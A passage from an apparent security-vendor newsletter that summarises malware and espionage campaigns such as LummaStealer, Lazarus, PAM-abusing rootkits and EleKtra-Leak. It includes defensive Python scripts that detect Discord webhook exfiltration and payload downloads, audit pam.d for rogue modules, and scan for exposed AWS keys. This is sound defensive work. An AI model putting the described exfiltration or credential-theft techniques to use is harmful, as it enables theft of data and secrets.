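1698000003 10.0.0.7 GET https://discord.com/channels/@me 0
1698000004 10.0.0.8 GET https://cdn.discordapp.com/attachments/333/444/photo.png 0
"""

WEBHOOK_PATH = re.compile(r"^/api/webhooks/\d+/[A-Za-z0-9_-]+")
PAYLOAD_EXT = (".exe", ".dll", ".scr", ".bat", ".ps1", ".vbs", ".js", ".lnk", ".zip", ".iso")

def classify(line):
    """Return (client_ip, reason) for a suspicious line, else None."""
    try:
        _ts, client, method, url, bytes_out = line.split()
    except ValueError:
        return None
    u = urlparse(url)
    host = (u.hostname or "").lower()
    # Webhooks only accept POSTs; a workstation or server posting to one is a
    # likely exfiltration channel, and bytes_out shows how much data left.
    if host == "discord.com" and method == "POST" and WEBHOOK_PATH.match(u.path):
        return client, f"webhook POST ({bytes_out} bytes out)"
    # Executable-like attachment fetched from the Discord CDN.
    if host == "cdn.discordapp.com" and u.path.startswith("/attachments/") \
            and u.path.lower().endswith(PAYLOAD_EXT):
        return client, f"CDN payload download {u.path.rsplit('/', 1)[-1]}"
    return None

def scan(log_text):
    """Return the list of (client_ip, reason) findings for a block of log text."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for client, reason in scan(SAMPLE_LOG):
        print(f"{client}: {reason}")
```

Where Discord is not a sanctioned business tool, the simpler control is to block both hosts at the proxy; this script is for environments that must allow chat traffic but not webhook uploads or executable attachments.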

An iLUMMAnation on LummaStealer - VMware Security Blog

VMware researchers have observed the evolution and changes of LummaStealer since its appearance as a Malware-as-a-Service (MaaS). Various attackers who purchased the LummaStealer program deceive victims through fake Chrome browser updates. Once such an update is executed, a loader called IDAT is deployed, which prepares the final LummaStealer payload.

Updated MATA attacks industrial companies in Eastern Europe

Kaspersky released a detailed report regarding the use of the complex MATA malware, generations 4 and 5, against defense infrastructure in Eastern Europe. Threat actors deployed a rootkit and a modular backdoor, together with plugins capable of keylogging, taking screenshots and stealing saved credentials. In addition, the attackers leveraged an exploit for CVE-2021-26411 to disable security products and an intricate malware that spreads itself through USB sticks.

Kazakhstan-associated YoroTrooper disguises origin of attacks as Azerbaijan

Talos discussed the cyber-espionage activities of a new threat actor, YoroTrooper. Based in Kazakhstan, YoroTrooper has been active since June 2022 and primarily targets Commonwealth of Independent States (CIS) countries. The threat actor uses a variety of tactics, including obfuscating the origin of their operations and relying heavily on phishing emails, to compromise state-owned websites and accounts belonging to government officials. YoroTrooper also demonstrates a defensive interest in the Kazakhstani state-owned email service and has rarely targeted Kazakh entities.

Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers

The cyberespionage group Winter Vivern has been exploiting a zero-day XSS vulnerability in the Roundcube Webmail server since October 2023. The targeted entities included governmental entities and a think tank, all located in Europe. The attackers sent a specially crafted email message containing malicious JavaScript, which activated upon viewing the message in a web browser. This allowed them to exfiltrate email messages from the victim's account to their command and control server. The vulnerability was patched by Roundcube in October 2023, but the group had been exploiting it to target entities since at least 2022.

New Undetected Python-Based Info-stealer Offered Via Dedicated Website

GBHackers has published a report about a new malware, found in March 2023, which has the capacity to steal sensitive information and upload it to an online storage management service. The malware is disguised as a CMD script with obfuscated code. It has the ability to create a folder to store stolen information, target multiple browsers and steal financial data.

A cascade of compromise: unveiling Lazarus' new campaign

Securelist published an article describing how the Lazarus group compromised corporate systems using the SIGNBT backdoor and the LPEClient infostealer. Both SIGNBT and LPEClient are executed in-memory in order to avoid detection. The backdoor is deployed through a vulnerability that is, at the moment, unknown, which allows the attackers to perform DLL hijacking and sideloading. LPEClient is capable of stealing locally saved credentials.

Higaisa APT Resurfaces via Phishing Website targeting Chinese Users

Cyble described a new cyber-espionage campaign by the Advanced Persistent Threat (APT) group, Higaisa, believed to have South Korean origins. The campaign involves phishing websites that mimic well-known software applications to lure victims, specifically targeting Chinese users with a website masquerading as OpenVPN software. The malicious payload is a Rust-based malware that triggers a Shellcode, which then establishes encrypted Command and Control (C&C) communication with a remote threat actor. The malware shares characteristics with those previously employed by Higaisa APT in their past campaigns, suggesting a resurgence of this group's activities.

StripedFly: Perennially flying under the radar

Securelist discovered a highly advanced modular backdoor, StripedFly, for both Windows and Linux, capable of information stealing, cryptomining, remote access and self-spreading inside the affected network. The backdoor is deployed using an exploit similar to the EternalBlue SMBv1 exploit, but judging by the creation timestamp embedded in the malware, it might have been created earlier than the first publicly disclosed exploit. The malware is distributed through code-hosting platforms such as Bitbucket, GitHub and GitLab. Communication with the C2 goes through the TOR network.

Malvertising via Dynamic Search Ads delivers malware bonanza

Malwarebytes discovered a rare situation in which compromised websites accidentally spread malware through Google Dynamic Search Ads. These ads unintentionally promoted a popular Python development program, and users who clicked on them were redirected to the compromised page. This page advertised a fake serial key for the program, which when downloaded, installed a dozen different pieces of malware on the user's computer. The website owner was unaware of the compromise, making them an unintentional intermediary in the attack. The malware infected computers to the point of rendering them unusable.

When PAM Goes Rogue: Malware Uses Authentication Modules for Mischief

Unit42 described a cyber threat campaign utilizing Pluggable Authentication Module (PAM) APIs in various malware to intercept or manipulate the authentication process on Linux systems. The threat actors target the flexibility and modularity of PAM, which is widely used for authentication and authorization. The malware families discussed include Orbit, Azazel rootkit, Derusbi, and Skidmap, all of which leverage PAM APIs for malicious activities such as logging user credentials and establishing remote access.
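Because the malware families above sit inside the PAM stack itself, one defender-side check is to audit what the pam.d configuration actually loads. The script below is an added example, not code from Unit 42: it flags modules referenced by an absolute path outside the distribution's PAM module directories and module names missing from a known-good allowlist; the pam.d tree and the allowlist are constructed for the demo, and hash-verifying the module binaries against the package manager is the complementary check it does not cover.

```python
"""Audit pam.d configuration for modules that deviate from a baseline. Added example,
not Unit 42 code; the pam.d tree and the allowlist are constructed for this demo."""
import os
import tempfile

STANDARD_DIRS = {"/lib/security", "/lib64/security", "/usr/lib/security",
                 "/usr/lib64/security", "/usr/lib/x86_64-linux-gnu/security"}
BASELINE = {"pam_unix.so", "pam_deny.so", "pam_permit.so", "pam_env.so",
            "pam_nologin.so", "pam_limits.so"}  # constructed; derive from a known-good image

def parse_pam_file(path):
    """Yield (service, module) for each module line in one pam.d file."""
    with open(path) as fh:
        for raw in fh:
            fields = raw.split("#", 1)[0].split()
            if len(fields) < 3 or fields[0].startswith("@"):  # blank, comment, @include
                continue
            rest = fields[1:]  # <control> <module> [args]
            if rest[0].startswith("["):  # bracketed control values may contain spaces
                end = next((i for i, f in enumerate(rest) if f.endswith("]")), len(rest))
                rest = rest[end + 1:]
            else:
                rest = rest[1:]
            if rest:
                yield os.path.basename(path), rest[0]

def audit(pam_dir, baseline=BASELINE):
    """Return (service, module, reason) for each suspicious module reference."""
    findings = []
    for name in sorted(os.listdir(pam_dir)):
        for service, module in parse_pam_file(os.path.join(pam_dir, name)):
            if module.startswith("/") and os.path.dirname(module) not in STANDARD_DIRS:
                findings.append((service, module, "loaded from outside standard PAM directories"))
            elif os.path.basename(module) not in baseline:
                findings.append((service, module, "module not in baseline allowlist"))
    return findings

def build_sample_pam_dir():
    """Write a constructed pam.d tree: one clean service, one with two bad lines."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "sshd"), "w") as fh:
        fh.write("auth required pam_unix.so\n@include common-account\n")
    with open(os.path.join(d, "common-auth"), "w") as fh:
        fh.write("auth [success=1 default=ignore] pam_unix.so nullok\n"
                 "auth optional /usr/lib/libhook.so   # rogue path\n"
                 "auth required pam_evil_cred.so\n")
    return d

if __name__ == "__main__":
    print(*audit(build_sample_pam_dir()), sep="\n")
```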

Hacktivism in the Israel-Hamas Conflict | Citizen Data Leaked Using Old Malware

SentinelOne presented various hacktivist groups, including Haghjhoyan, Soldiers of Solomon, and Cyb3r Drag0nz Team, amidst the Israel-Hamas conflict. These groups have launched a variety of attacks such as DDoS attacks, cyber defacements, data leaks, and malware launches, primarily targeting Israeli citizens, businesses, and critical sector entities. They have used malware and tools like Redline Stealer and PrivateLoader to cause data leaks and widespread disruptions. Methods such as social engineering lures, disguised as popular game mods, were used to infect computers. The threat actors also claimed to have infiltrated critical infrastructure targets.

AridViper, an intrusion set allegedly associated with Hamas

Sekoia.io analysts released a report regarding AridViper, also known as APT C-23, a Hamas-associated cyber espionage group that has been active since at least 2012. The group utilizes Windows, iOS, and Android malware, spear phishing emails, and fake social media profiles to entice targets into installing malicious software. Once a host is compromised, the attacker can manipulate the victim's system via Command and Control (C2) servers.

Yellow Liderc ships its scripts and delivers IMAPLoader malware

The article describes a campaign by the Iran-based threat actor Yellow Liderc, targeting various industries including maritime, shipping, logistics, nuclear, aerospace, defense, and IT managed service providers. The attackers used strategic web compromises and phishing activities to embed JavaScript, which fingerprints website visitors and tracks the victim's location and other information. They also used a .NET malware named IMAPLoader that has the ability to fingerprint victim systems using native Windows utilities and acts as a downloader for further payloads. Other activities include phishing pages whose purpose is to download malicious Python payloads via fake Excel documents.

Ransomware Roundup - Knight

Fortinet has published an article describing a ransomware attack by a group named Knight. The group uses double extortion tactics to encrypt victims' files and exfiltrate data. The ransomware primarily targets Microsoft Windows systems and has a high severity level. The attack begins with a phishing campaign, and known malware such as Remcos and Qakbot are used to deliver the ransomware.

Distribution of Remcos RAT Disguised as Payslip

Ahnlab has published an article describing a campaign where the Remcos remote control malware is being distributed via email, disguised as a payslip. The email's subject tricks the recipients into opening the attached .cab file, which contains the malware disguised as a PDF. The malware can perform keylogging, screenshot capturing, controlling webcams and microphones, and extract browser histories and passwords. It is designed to not show any malicious behaviours until it receives commands from the threat actor's server. However, it can be detected with sandbox devices due to the behaviors of the offline keylogger which runs immediately after infection.

CloudKeys in the Air: Tracking Malicious Operations of Exposed IAM Keys

The article discusses a campaign, referred to as EleKtra-Leak, run by unidentified threat actors. The actors target exposed identity and access management (IAM) credentials on public GitHub repositories. Upon discovery, these credentials are used to create AWS Elastic Compute (EC2) instances for prolonged cryptojacking operations. The actors reportedly detect and exploit exposed IAM credentials within five minutes of their appearance on GitHub.
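Given the five-minute window the report describes, the practical control is to stop key material from reaching GitHub at all, for example in a pre-commit hook. The scanner below is an added example, not code from Unit 42: it matches the AWS access key ID format and pairs it with an entropy check on candidate secret keys so that placeholders are not flagged; the sample credentials file is constructed and uses AWS's publicly documented example key pair.

```python
"""Scan text (e.g. files staged for a commit) for AWS access key pairs before they
reach a public repository. Added example, not part of the Unit 42 EleKtra-Leak
report; the key pair below is the publicly documented AWS example pair."""
import math
import re
from collections import Counter

ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")
# 40-char base64-like token following "secret..." and an assignment character.
SECRET_LINE_RE = re.compile(r"secret[^\n]{0,40}?[=:'\"]\s*['\"]?([A-Za-z0-9/+]{40})\b", re.I)

def shannon_entropy(s):
    """Bits of entropy per character; random 40-char secrets score well above 4."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def find_aws_credentials(text, min_entropy=4.0):
    """Return (line_no, kind, value) findings in line order."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append((no, "access_key_id", m.group(1)))
        for m in SECRET_LINE_RE.finditer(line):
            # Entropy threshold drops placeholders such as "AAAA..." or "xxxx...".
            if shannon_entropy(m.group(1)) >= min_entropy:
                findings.append((no, "secret_access_key", m.group(1)))
    return findings

# Constructed sample: a credentials file with the documented example key pair,
# a low-entropy placeholder that must not be flagged, and benign lines.
SAMPLE = """\
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
# placeholder below is deliberately low-entropy
aws_secret_access_key = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
region = us-east-1
"""

if __name__ == "__main__":
    for no, kind, value in find_aws_credentials(SAMPLE):
        print(f"line {no}: {kind} = {value[:4]}...")  # never echo the full secret
```

A hook that exits non-zero when the list is non-empty blocks the commit; any key that does slip out should be treated as compromised and rotated rather than merely deleted from history.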

Ready to take your security to the next level? Visit our website for more information. Stay ahead of the curve in the ever-changing world of cybersecurity with Keysight.
